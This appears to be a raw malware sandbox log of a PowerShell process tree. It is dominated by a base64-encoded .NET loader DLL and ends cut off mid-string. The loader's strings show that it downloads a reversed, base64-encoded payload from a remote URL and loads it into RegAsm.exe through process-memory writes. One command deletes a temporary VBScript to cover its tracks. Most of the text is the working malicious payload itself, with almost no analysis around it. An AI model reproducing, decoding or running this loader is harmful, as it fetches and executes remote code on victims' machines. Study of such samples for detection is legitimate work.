AAhABBASAEigBRAbcBkQBBAVgElgBZAcgAmwBZARcIoQBhAREFpwBpAUcErQBhAawAswAhAVQBuwDRAL4AwQB5ARQByACBAXUGzwCBAWMG1gCJAREE2gC5AAEI3wC5AAgB5AC5AGcE6ACRAdAA9AA0AGQICwE8AP0DSgA8AAcEIgE8AI8GBgApAKMAsgMuAAsA1QEuABMA3gEuABsA/QEuACMABgIuACsABgIuADMABgIuADsABgIuAEMABgIuAEsABgIuAFMABgIuAFsADAIuAGMANgIuAGsAQwJAAIMAjQJAAHsAkgJDAHMAmwJDAHsAkgJJAKMAwwNjAHMAmwJjAHsAkgJpAKMA1wOAAIMAjQKDAIsAjQKDAJMAjQKDAHMAmwKJAKMA5AOgAIMAjQKjAIsAjQKjAHMAtAKjAKsAjQKjALMAjQKjAJMAjQKpAHsA/QHAAIMAjQLDALMAjQLDAHMA9gLDAHsA/QHJAHsA/QHgAIMAjQLjAIsAjQLjAJMAjQLjAKsAjQLjALMAjQIJAaMA+AMjAXsAkgIjAZsAUANDAXsAkgJDAVMABgIgAnsAkgIgAoMAjQJAAnsAkgJAAoMAjQJgAnsAkgJgAoMAjQKAAnsAkgKAAoMAjQKgAoMAjQLAAoMAjQLgAoMAjQLgAnsAkgIAA4MAjQIgA4MAjQIgA3sAkgJ0AOwA/wAEAAEABQAFAAYABwAHAAgACgAJAAAAWgasAQAANQWxAQAARga2AQAA3wa7AQAABgbAAQAAfAHFAQAAPgjLAQAA7wfLAQAA4wDQAQIABAADAAIABQAFAAIABgAHAAIABwAJAAIACAALAAIACQANAAEACgANAAIADQAPAAIADgARAAIAGAATAC4ANQA8AEMA8QAEARMBGgEEgAAAAQAAAAAAAAAAAAAAAAAyAAAABAAAAAAAAAAAAAAAKAGNAAAAAAAEAAAAAAAAAAAAAAAoAdcEAAAAAAoAAAAAAAAAAAAAADEBlgAAAAAAAAAAAAEAAACnBwAACQAEAAoABAAAABAAFABSAAAAEAArAFIAAAAAAC0AUgB5APoAeQAdAQAAAAAAQ29udGV4dFZhbHVlYDEAVGhyZWFkU2FmZU9iamVjdFByb3ZpZGVyYDEAQ2xhc3MxAENsYXNzTGlicmFyeTMAZ2V0X1VURjgAPE1vZHVsZT4AVABRQlh0WABEaXNwb3NlX19JbnN0YW5jZV9fAENyZWF0ZV9fSW5zdGFuY2VfXwBQcm9qZWN0RGF0YQBtc2NvcmxpYgBNaWNyb3NvZnQuVmlzdWFsQmFzaWMATG9hZABTeW5jaHJvbml6ZWQAR2V0TWV0aG9kAFJlcGxhY2UAQ3JlYXRlSW5zdGFuY2UAZ2V0X0dldEluc3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU2VydmljZVBvaW50TWFuYWdlcgBTeXN0ZW0uQ29kZURvbS5Db21waWxlcgBnZXRfVXNlcgBnZXRfQ29tcHV0ZXIATXlDb21wdXRlcgBDbGVhclByb2plY3RFcnJvcgBTZXRQcm9qZWN0RXJyb3IAQWN0aXZhdG9yAC5jdG9yAC5jY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkRldmljZXMAZ2V0X1dlYlNlcnZpY2VzAE15V2ViU2VydmljZXMATWljcm9zb2Z0LlZpc3VhbEJhc2ljLkFwcGxpY2F0aW9uU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5Db21waWxlclNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAU3lzdGVtLlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLk15LlJlc291cmNlcwBDbGFzc0xpYnJhcnkzLlJlc291cmNlcy5yZXNvdXJjZXMARGVidWdnaW5nTW9kZXMAU3RyaW5ncwBnZXRfU2V0dGluZ3MATXlTZXR0aW5ncwBSZWZlcmVuY2VFcXVhbHMAUnVudGltZUhlbHBlcnMAQ29uY2F0AE9iamVjdABNeVByb2plY3QAU3lzdGVtLk5ldABnZXRfRGVmYXVsdABXZWJDbGllbnQAQ29udmVydABTeXN0ZW0uVGV4dABtX0NvbnRleHQAQ2xhc3NMaWJyYXJ5My5NeQBnZXRfQXNzZW1ibHkATXlTZXR0aW5nc1Byb3BlcnR5AAAAL0MAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBSAGUAcwBvAHUAcgBjAGUAcwAAe3QAeAB0AC4AMwAwAGUAcABtAHUAUgAvADMAMAAtAGUAcABtAHUAcgAvAHMAbQBlAHQAaQAvADIAMQAvAGcAcgBvAC4AZQB2AGkAaABjAHIAYQAuAHMAdQAuADMAMAA0ADEAMAA2AGEAaQAvAC8AOgBzAHAAdAB0AGgAAQUDJgMmAQNBAABFQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawAAF1wAdgA0AC4AMAAuADMAMAAzADEAOQAAKUMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBDAGwAYQBzAHMAMQAAB1IAdQBuAAAXXABSAGUAZwBBAHMAbQAuAGUAeABlAAAAe000wQGMFUmZ7QBV0BJNAQAEIAEBCAMgAAEFIAEBEREEIAEBDgQgAQECBSACAQ4OBSABARFBByAEAQ4ODg4GFRIoARIMBhUSKAESCAYVEigBEmEGFRIoARIkBCAAEwAFAAICHBwHAAESaRGAjQUgABKAkQcgAgEOEoCRCAABEoCVEoCVCAcEDg4OEoCJBgABARGAnQUAABKApQYgAQESgKUEAAEODgQgAQ4OBSACDg4OBQACDg4OBQAAEoCxBQABHQUOByABEoCRHQUFIAESaQ4GIAESgLkOBiACHBwdHAYAAQESgIkDAAABBAABHBwEIAECHAMgAAgDIAAOBAcBHgACHgAFEAEAHgAECgEeAAQHARMABhUSKAETAAcGFRJtARMABhUSbQETAAITAAQKARMABSABARMACLd6XFYZNOCJCLA/X38R1Qo6BwYVEigBEgwHBhUSKAESCAcGFRIoARJhBwYVEigBEiQDBhJ9BAYSgIEDBhIYBAAAEgwEAAASCAQAABJhBAAAEiQEAAASfQUAABKAgQYAAQESgIEEAAASGAQAAQEOBCAAEmkHEAEBHgAeAAcwAQEBEB4ABAgAEgwECAASCAQIABJhBAgAEiQECAASfQUIABKAgQQIABIYBCgAEwAIAQAIAAAAAAAeAQABAFQCFldyYXBOb25FeGNlcHRpb25UaHJvd3MBCAEAAgAAAAAABQEAAAAAKQEAJDc5MTcyQjEzLUVEQkEtNDA5Ni1CNzI1LThFOTJCNzMwQjJCQQAADAEABzEuMC4wLjAAAEkBABouTkVURnJhbWV3b3JrLFZlcnNpb249djQuNQEAVA4URnJhbWV3b3JrRGlzcGxheU5hbWUSLk5FVCBGcmFtZXdvcmsgNC41BAEAAAAIAQABAAAAAAAYAQAKTXlUZW1wbGF0ZQgxMS4wLjAuMAAAQQEAM1N5c3RlbS5SZXNvdXJjZXMuVG9vbHMuU3Ryb25nbHlUeXBlZFJlc291cmNlQnVpbGRlcggxNi4wLjAuMAAAWQEAS01pY3Jvc29mdC5WaXN1YWxTdHVkaW8uRWRpdG9ycy5TZXR0aW5nc0Rlc2lnbmVyLlNldHRpbmdzU2luZ2xlRmlsZUdlbmVyYXRvcggxNi4yLjAuMAAAYQEANFN5c3RlbS5XZWIuU2VydmljZXMuUHJvdG9jb2xzLlNvYXBIdHRwQ2xpZW50UHJvdG9jb2wSQ3JlYXRlX19JbnN0YW5jZV9fE0Rpc3Bvc2VfX0luc3RhbmNlX18AAAAQAQALTXkuQ29tcHV0ZXIAABMBAA5NeS5BcHBsaWNhdGlvbgAADAEAB015LlVzZXIAABMBAA5NeS5XZWJTZXJ2aWNlcwAAEAEAC015LlNldHRpbmdzAAAAAAC0AAAAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAAAAAAAAAAAAFBBRFBBRFC0AAAAAAAAAEjHs6YAAAAAAgAAAHkAAAA0OgAANBwAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAABSU0RTwXm99VrAVE+BVXsy6I9KRwEAAABDOlxVc2Vyc1xwam9hb1xEZXNrdG9wXFVwQ3J5XE1ldG9kbyBERlxDbGFzc0xpYnJhcnkzXENsYXNzTGlicmFyeTNcb2JqXFJlbGVhc2VcQ2xhc3NMaWJyYXJ5My5wZGIA1ToAAAAAAAAAAAAA7zoAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOE6AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAOwCAAAAAAAAAAAAAOwCNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARMAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAAoAgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAAKgABAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAACYAAQABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAAAAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAEwAEgABAE8AcgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAzAC4AZABsAGwAAAAiAAEAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAAAAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwAAAMAAAABDsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');powershell.exe -Command $VXdfe; Remove-Item -Path C:\Users\Admin\AppData\Local\Temp\x.vbs
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1304

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$pICwv = '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c3RhbmNlAGRlZmF1bHRJbnN0YW5jZQBpbnN0YW5jZQBHZXRIYXNoQ29kZQBJbnZva2UAUnVudGltZVR5cGVIYW5kbGUAR2V0VHlwZUZyb21IYW5kbGUAU2VjdXJpdHlQcm90b2NvbFR5cGUAR2V0VHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUATWV0aG9kQmFzZQBBcHBsaWNhdGlvbkJhc2UAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UAU3RyUmV2ZXJzZQBFZGl0b3JCcm93c2FibGVTdGF0ZQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAEhlbHBLZXl3b3JkQXR0cmlidXRlAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAEVkaXRvckJyb3dzYWJsZUF0dHJpYnV0ZQBDb21WaXNpYmxlQXR0cmlidXRlAEFzc2VtYmx5VGl0bGVBdHRyaWJ1dGUAU3RhbmRhcmRNb2R1bGVBdHRyaWJ1dGUASGlkZU1vZHVsZU5hbWVBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAVGFyZ2V0RnJhbWV3b3JrQXR0cmlidXRlAERlYnVnZ2VySGlkZGVuQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAZ2V0X1ZhbHVlAHNldF9WYWx1ZQBHZXRPYmplY3RWYWx1ZQBzZXRfRW5jb2RpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBGcm9tQmFzZTY0U3RyaW5nAERvd25sb2FkU3RyaW5nAFRvU3RyaW5nAE1pY3Jvc29mdC5WaXN1YWxCYXNpYy5NeVNlcnZpY2VzLkludGVybmFsAFN5c3RlbS5Db21wb25lbnRNb2RlbABDbGFzc0xpYnJhcnkzLmRsbABzZXRfU2VjdXJpdHlQcm90b2NvbABTeXN0ZW0AcmVzb3VyY2VNYW4AU3lzdGVtLkNvbXBvbmVudE1vZGVsLkRlc2lnbgBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4AZ2V0X0FwcGxpY2F0aW9uAE15QXBwbGljYXRpb24AU3lzdGVtLkNvbmZpZ3VyYXRpb24AU3lzdGVtLkdsb2JhbGl6YXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ARXhjZXB0aW9uAFJ1bgBNZXRob2RJbmZvAEN1bHR1cmVJbmZvAG1fQXBwT2JqZWN0UHJvdmlkZXIAbV9Vc2VyT2JqZWN0UHJvdmlkZXIAbV9Db21wdXRlck9iamVjdFByb3ZpZGVyAG1fTXlXZWJTZXJ2aWNlc09iamVjdFByb3ZpZGVyAGdldF9SZXNvdXJjZU1